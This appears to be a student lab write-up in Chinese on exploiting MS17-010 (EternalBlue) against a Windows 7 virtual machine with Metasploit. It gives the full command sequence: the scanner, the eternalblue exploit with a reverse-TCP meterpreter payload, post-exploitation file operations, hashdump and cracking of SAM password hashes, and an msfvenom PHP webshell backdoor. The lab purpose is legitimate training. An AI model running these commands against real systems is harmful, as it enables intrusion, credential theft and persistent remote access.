MS17-010漏洞利用

MS17-010漏洞利用

1.安裝虛擬機win7 x64,實現利用ms17-010實現對其win7 x64主機開始滲透,查看該主機信息,打開遠程桌面,抓取用戶名和密碼並破譯,創建一個 : 學號.txt文件,實現上傳,下載,刪除。

首先啟動win7 x64虛擬機,查看IP地址為192.168.70.139,如下如圖所示:

在win7 x64上搭建wamp網站服務器從上到下依次安裝軟件,如下如所示:

安裝成功後通過瀏覽器訪問192.168.70.139查看是否能正常訪問該網站,如下圖所示:

Ms17-010漏洞的利用

接下來打開kali實現利用ms17-010漏洞,實現對其win7 x64主機進行滲透,首先使用scanner下掃描模塊掃描目標主機是否存在ms17-010的漏洞,如下圖所示:
在kali中輸入以下命令:

命令:msfconsole

命令:search ms17-010

>use auxiliary/scanner/smb/smb_ms17-010
>set RHOSTS 192.168.70.139
>run

確認目標機器的操作系統及存在漏洞之後便可以進行漏洞攻擊了,輸入命令use exploit/windows/smb/ms17_010_eternalblue,調用exploit下的ms17_010_eternalblue模塊,並輸入命令show payloads 查看可用的payload,如下圖所示:

輸入命令set payload windows/x64/meterpreter/reverse_tcp設置payload,並輸入命令show options查看參數配置,如下圖所示,需要配置的參數為RHOST和LHOST

輸入命令set RHOST 192.168.70.139 配置目標機器的IP地址,輸入命令set LHOST 192.168.70.134 配置kali本地的IP地址,配置完成後輸入命令show options檢查參數,如下圖所示:

參數配置檢查無誤後,輸入命令run開始攻擊,並且返回一個meterptrter會話說明已經攻擊成功了,如下圖所示:

後滲透攻擊:信息收集

進程遷移:例如攻擊者利用瀏覽器漏洞攻陷了目標主機,但攻擊滲透後的瀏覽器有可能被用戶關閉,此shell是非常脆弱的,所以獲取shell後的第一步就是移動這個shell,將它和目標主機中一個穩定的進程綁定在一起。

例如:輸入ps命令獲取目標主機正在運行的進程,如下圖所示:

輸入命令getpid查看meterperter shell的進程號為2280,如下圖所示:

我們可用使用自動遷移進程命令,系統會自動尋找合適的進程然後進行遷移,輸入自動遷移命令run post/windows/manage/migrate,執行命令後此時將原先的2280進程號修改為1244,如圖所示:

收集系統信息:獲取了穩定進程之後開始收集系統信息,輸入命令sysinfo查看目標主機的系統信息,如下圖所示:

捕獲桌面輸入命令screenshot抓取目標主機的屏幕截圖路徑為/root/bPgQxuoB,jpeg文件,如下圖所示:

輸入shell命令進入目標機器shell,如下圖所示:

在shell輸入exit可用停止shell會話並返回meterperter中,如下圖所示:

上傳文件命令upload,在kali虛擬機root目錄下存在70zsz.txt文件,其內容為I『m is 70 zsz!,輸入命令upload /root/70zsz.txt c:\\,此文件上傳到目標機器c:\目錄下,如下圖所示:

輸入shell進入Windows shell查看從c:\目錄下是否有剛剛我們上傳的70zsz.txt文件,如下圖所示:

下載文件命令download,輸入命令download c:\70zsz.txt/root/download將目標機器c:\下的70zsz.txt下載到本機/root/download中,如下圖所示:

輸入命令rm c:\\70zsz.txt 將目標機器c:\下的70zsz.txt刪除,如下圖所示:

後滲透攻擊:Hash攻擊

使用Hashdump抓取密碼,HashdumpMeterpreter腳本可用從目標機器中提取Hash值,破解Hash值可獲得登錄密碼。計算機中的每個賬號的用戶名和密碼都存儲在sam中,當計算機運行時,該文件對所有賬號進行鎖定,想要訪問就必須有「系統級「的賬號。

在meterpreter shell提示符下輸入hashdump命令,將導出sam數據庫中Hash,如下圖所示:

從圖中我們可用看出,返回了三個用戶賬號,分別為Administrator,Guest,zsz,數據輸出的格式為用戶名:SID:LM哈希:NTLM哈希:::,在zsz賬戶中NTLM哈希進行破解,使用在線破解網站對其進行破解,如//www.cmd5.com/,可以看到結果正是為zsz賬戶的密碼:123456

後滲透攻擊:後門

Meterpreter後門:在Meterpreter中,有一個名為PGP Meterpreter的payload,利用這個模塊可創建具有Meterpreter功能的PHP WebShell,在攻擊中使用Metasploit PHP Shell步驟如下:
1.使用msfvenom創建一個webshell.php

2.上傳webshell.php到目標服務器

3.運行Metasploit multi-handler開始監聽

4.訪問webshell.php頁面

5.獲得反彈Metasploit shell

首先通過Metasploit的msfvenom攻擊製作PHP Meterpreter,輸入命令msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.70.134 -f raw > 070zsz.php,如下圖所示:

因為目標主機使用了wampserver,因此得知需要上傳070zsz.php文件至目標主機中c:\wamp64\www中,如下圖所示:

輸入exit返回meterpreter,使用上傳命令upload/root/070zsz.php c:\\wamp64\\www中,如下圖所示:

輸入exit回到msf,輸入如下命令設置監聽,如下圖所示:

>exit
>use exploit/multi/handler
>set payload php/meterpreter/reverse_tcp
>set LHOST 192.168.70.134
>run

打開瀏覽器,訪問目標機器服務器中070zsz.php文件,即訪問//192.168.70.139/070zsz.php ,結果可以看到服務端反彈shell成功如下圖所示: